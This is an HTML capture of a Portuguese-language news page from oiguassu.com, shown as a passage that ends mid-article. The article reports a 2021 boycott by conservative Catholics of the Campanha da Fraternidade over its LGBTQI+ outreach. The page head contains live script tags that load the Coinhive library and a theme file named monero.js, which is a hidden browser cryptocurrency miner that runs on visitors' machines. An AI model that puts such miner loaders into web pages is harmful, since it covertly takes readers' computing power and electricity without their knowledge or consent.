

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5NH0WLB29C"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5NH0WLB29C');
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

	<!-- This site is optimized with the Yoast SEO plugin v15.6.2 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+) -</title>
	<meta name="robots" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
	<link rel="canonical" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+) -" />
	<meta property="og:description" content="Aceno por diálogo com população LGBTQI+ enfureceu fundamentalistas, que incentivam fiéis a não doar para a iniciativa no Domingo de Ramos." />
	<meta property="og:url" content="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/" />
	<meta property="article:published_time" content="2021-02-15T07:00:39+00:00" />
	<meta property="article:modified_time" content="2021-02-15T13:19:18+00:00" />
	<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr.jpg" />
	<meta property="og:image:width" content="1700" />
	<meta property="og:image:height" content="1065" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Written by">
	<meta name="twitter:data1" content="admin">
	<meta name="twitter:label2" content="Est. reading time">
	<meta name="twitter:data2" content="3 minutos">
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://oiguassu.com/#website","url":"https://oiguassu.com/","name":"Oiguassu","description":"","potentialAction":[{"@type":"SearchAction","target":"https://oiguassu.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/#primaryimage","inLanguage":"pt-BR","url":"http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr.jpg","width":1700,"height":1065},{"@type":"WebPage","@id":"http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/#webpage","url":"http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/","name":"Brasil: CAT\u00d3LICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+) -","isPartOf":{"@id":"https://oiguassu.com/#website"},"primaryImageOfPage":{"@id":"http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/#primaryimage"},"datePublished":"2021-02-15T07:00:39+00:00","dateModified":"2021-02-15T13:19:18+00:00","author":{"@id":"https://oiguassu.com/#/schema/person/1d041553b5df955921650ef8aff3cd06"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/"]}]},{"@type":"Person","@id":"https://oiguassu.com/#/schema/person/1d041553b5df955921650ef8aff3cd06","name":"admin","image":{"@type":"ImageObject","@id":"https://oiguassu.com/#personlogo","inLanguage":"pt-BR","url":"http://1.gravatar.com/avatar/720ba8469fe039789215358cbb933434?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http://www.oiguassu.com"]}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+)" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.6.1"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://oiguassu.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1611098778' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=9.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=9.3.1' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20201207' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.6.1' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.6.1' id='monero-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.6.1' id='monero2-js'></script>
<link rel="https://api.w.org/" href="http://oiguassu.com/wp-json/" /><link rel="alternate" type="application/json" href="http://oiguassu.com/wp-json/wp/v2/posts/30624" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.6.1" />
<link rel='shortlink' href='https://wp.me/pS5BS-7XW' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fbrasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fbrasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #0f7200; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #0f7200; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #0f7200; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News-32x32.jpg" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="http://oiguassu.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News-180x180.jpg" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News-270x270.jpg" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-30624 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2020/08/cropped-O-IGUASSU-Cartão-Front-1064-x-451-v2.jpg" height="338" width="1064" alt="" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu"><ul>
<li class="page_item page-item-2"><a href="http://oiguassu.com/about/">About</a></li>
<li class="page_item page-item-7"><a href="http://oiguassu.com/">Home</a></li>
</ul></div>
		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/tenha-mais-tempo-para-deus-tambem/" title="TENHA MAIS TEMPO PARA DEUS TAMBÉM!">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">TENHA MAIS TEMPO PARA DEUS TAMBÉM!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/" title="Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+)">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+)</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/covid-por-todo-o-pais-cidades-do-carnaval-vivem-tristeza-e-rotina-fora-de-epoca/" title="Covid: POR TODO O PAÍS, CIDADES DO CARNAVAL VIVEM TRISTEZA E &#8216;ROTINA FORA DE ÉPOCA&#8217;">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Covid: POR TODO O PAÍS, CIDADES DO CARNAVAL VIVEM TRISTEZA E &#8216;ROTINA FORA DE ÉPOCA&#8217;</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/pandemia-desembargador-suspende-retorno-das-aulas-em-londrina/" title="Pandemia: DESEMBARGADOR SUSPENDE RETORNO DAS AULAS EM LONDRINA">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: DESEMBARGADOR SUSPENDE RETORNO DAS AULAS EM LONDRINA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/decisao-sem-auxilio-federal-prefeitos-prorrogam-ou-criam-beneficios-municipais/" title="Decisão: AINDA SEM AUXÍLIO FEDERAL, PREFEITOS PRORROGAM OU CRIAM BENEFÍCIOS MUNICIPAIS">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Decisão: AINDA SEM AUXÍLIO FEDERAL, PREFEITOS PRORROGAM OU CRIAM BENEFÍCIOS MUNICIPAIS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/aos-90-anos-muere-el-expresidente-carlos-menem-icono-de-la-argentina-del-ultraliberalismo/" title="Aos 90 años: MUERE EL EXPRESIDENTE CARLOS MENEM, ICONO DE LA ARGENTINA DEL ULTRALIBERALISMO">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Aos 90 años: MUERE EL EXPRESIDENTE CARLOS MENEM, ICONO DE LA ARGENTINA DEL ULTRALIBERALISMO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/politica-a-esquerda-retoma-o-voo-na-america-latina-mas-ainda-nao-encontra-seu-lugar-no-brasil/" title="Política: A ESQUERDA RETOMA O VOO NA AMÉRICA LATINA, MAS AINDA NÃO ENCONTRA SEU LUGAR NO BRASIL">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Política: A ESQUERDA RETOMA O VOO NA AMÉRICA LATINA, MAS AINDA NÃO ENCONTRA SEU LUGAR NO BRASIL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/escrache-ministerio-de-la-mujer-repudia-agresion-a-villamayor-y-a-mujeres-que-lo-acompanaban/" title="Escrache: MINISTERIO DE LA MUJER REPUDIA AGRESIÓN A VILLAMAYOR Y A MUJERES QUE LO ACOMPAÑABAN">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Escrache: MINISTERIO DE LA MUJER REPUDIA AGRESIÓN A VILLAMAYOR Y A MUJERES QUE LO ACOMPAÑABAN</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/tormenta-politica-canciller-de-peru-renuncia-salpicada-por-escandalo-de-vacunacion/" title="Tormenta política: CANCILLER DE PERÚ RENUNCIA SALPICADA POR ESCÁNDALO DE VACUNACIÓN">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Tormenta política: CANCILLER DE PERÚ RENUNCIA SALPICADA POR ESCÁNDALO DE VACUNACIÓN</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/investigacao-equipe-da-oms-desmente-midia-dos-eua-apos-reportagens-sobre-a-investigacao-das-origens-do-virus/" title="Investigação: EQUIPE DA OMS DESMENTE MÍDIA DOS EUA APÓS REPORTAGENS SOBRE A INVESTIGAÇÃO DAS ORIGENS DO VÍRUS">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Investigação: EQUIPE DA OMS DESMENTE MÍDIA DOS EUA APÓS REPORTAGENS SOBRE A INVESTIGAÇÃO DAS ORIGENS DO VÍRUS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/pandemia-parana-vacinou-239-862-pessoas-mas-precisa-melhorar-ritmo-de-imunizacao/" title="Pandemia: PARANÁ VACINOU 239.862 PESSOAS, MAS PRECISA MELHORAR RITMO DE IMUNIZAÇÃO">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: PARANÁ VACINOU 239.862 PESSOAS, MAS PRECISA MELHORAR RITMO DE IMUNIZAÇÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/coluna-caio-gottlieb-caiu-a-mascara/" title="Coluna Caio Gottlieb: CAIU A MÁSCARA">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Coluna Caio Gottlieb: CAIU A MÁSCARA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/pandemia-israel-testa-2-remedios-promissores-contra-covid-19/" title="Pandemia: ISRAEL TESTA 2 REMÉDIOS PROMISSORES CONTRA COVID-19">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: ISRAEL TESTA 2 REMÉDIOS PROMISSORES CONTRA COVID-19</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/escandalo-alemanha-comprou-cientistas-para-fazer-estudo-justificando-lockdown/" title="Escândalo: ALEMANHA COMPROU CIENTISTAS PARA FAZER ESTUDO JUSTIFICANDO LOCKDOWN">
					<span class="ticker-item-date">fevereiro 15, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Escândalo: ALEMANHA COMPROU CIENTISTAS PARA FAZER ESTUDO JUSTIFICANDO LOCKDOWN</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/esporte-os-5-jogadores-sul-americanos-sub-23-anos-mais-caros-do-mundo-hoje-dois-sao-brasileiros/" title="Esporte: OS 5 JOGADORES SUL-AMERICANOS SUB-23 ANOS MAIS CAROS DO MUNDO HOJE. DOIS SÃO BRASILEIROS">
					<span class="ticker-item-date">fevereiro 14, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Esporte: OS 5 JOGADORES SUL-AMERICANOS SUB-23 ANOS MAIS CAROS DO MUNDO HOJE. DOIS SÃO BRASILEIROS</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/extra/" itemprop="url"><span itemprop="title">Extra</span></a></span></nav>
<article id="post-30624" class="post-30624 post type-post status-publish format-standard has-post-thumbnail hentry category-extra tag-lgbtqi tag-papa">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			Brasil: CATÓLICOS CONSERVADORES SABOTAM CAMPANHA DA FRATERNIDADE 2021 (LGBTQI+)		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/lgbtqi/" rel="tag">LGBTQI+</a><a href="http://oiguassu.com/tag/papa/" rel="tag">Papa</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" srcset="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-120x67.jpg 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="26855" data-permalink="http://oiguassu.com/politica-ministro-da-justica-defende-que-cristaos-possam-discordar-da-homossexualidade/lgbt-rrrrrrrrr/" data-orig-file="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr.jpg" data-orig-size="1700,1065" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="lgbt rrrrrrrrr" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2020/12/lgbt-rrrrrrrrr-1024x642.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/admin/">admin</a></span>
<span class="entry-meta-date updated">fevereiro 15, 2021</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><h3 style="text-align: justify;" align="justify"><strong><span lang="pt-BR">Aceno por diálogo com população LGBTQI+ enfureceu fundamentalistas, que incentivam fiéis a não doar para a iniciativa no Domingo de Ramos.</span></strong></h3>
<p style="text-align: justify;">Após deixar de ser realizada no ano passado, por causa das restrições impostas pela pandemia de coronavírus, a Campanha da Fraternidade de 2021 começa sob ataques nas redes e ações de boicote. A cruzada é promovida por grupos católicos ultraconservadores, que se revoltaram com o protesto da iniciativa religiosa contra a violência sofrida pela população LGBTQI+.</p>
<p><a href="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884.jpg"><img data-attachment-id="30625" data-permalink="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/lgbtqi-catolic-cnbb-campanha/" data-orig-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884.jpg" data-orig-size="600,388" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="LGBTQI CATÓLIC CNBB CAMPANHA" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884-300x194.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884.jpg" loading="lazy" class="aligncenter size-full wp-image-30625" src="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884.jpg" alt="" width="600" height="388" srcset="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884.jpg 600w, http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-e1613299926884-300x194.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /></a></p>
<p style="text-align: justify;">Com o tema “Fraternidade e Diálogo: compromisso de amor”, a tradicional iniciativa que pede doações de fiéis para financiar projetos sociais apoiados pela Igreja Católica virou alvo de religiosos fundamentalistas nas redes sociais. Um dos motivos é a busca da inclusão, nesse diálogo, das minorias e a violência direcionada a esses grupos.</p>
<p style="text-align: justify;"><a href="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-ZZZ.jpg"><img data-attachment-id="30627" data-permalink="http://oiguassu.com/brasil-catolicos-conservadores-sabotam-campanha-da-fraternidade-2021-lgbtqi/lgbtqi-catolic-cnbb-campanha-zzz/" data-orig-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-ZZZ.jpg" data-orig-size="276,183" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="LGBTQI CATÓLIC CNBB CAMPANHA ZZZ" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-ZZZ.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-ZZZ.jpg" loading="lazy" class="alignleft size-full wp-image-30627" src="http://oiguassu.com/wp-content/uploads/2021/02/LGBTQI-CATOLIC-CNBB-CAMPANHA-ZZZ.jpg" alt="" width="276" height="183" /></a>Os ataques nas redes são ferozes e acusam líderes religiosos de terem aderido a “pautas abortistas e anticristãs”. Com vídeos no YouTube e hashtags no Twitter e no Instagram, esses grupos tentam incentivar os cristãos a não doar nenhum dinheiro para a Campanha da Fraternidade.</p>
<p style="text-align: justify;">Tradição católica desde a década de 1960, a campanha é promovida anualmente no período da quaresma, terminando no Domingo de Ramos, e tem sido realizada em versão ecumênica (convidando outras igrejas cristãs) a cada cinco anos, desde 2000.</p>
<p style="text-align: justify;">Nesses anos específicos, como é o caso de 2021, a Conferência Nacional dos Bispos do Brasil (CNBB) divide a organização da campanha com o Conselho Nacional das Igrejas Cristãs do Brasil (Conic), do qual representantes católicos também são integrantes.</p>
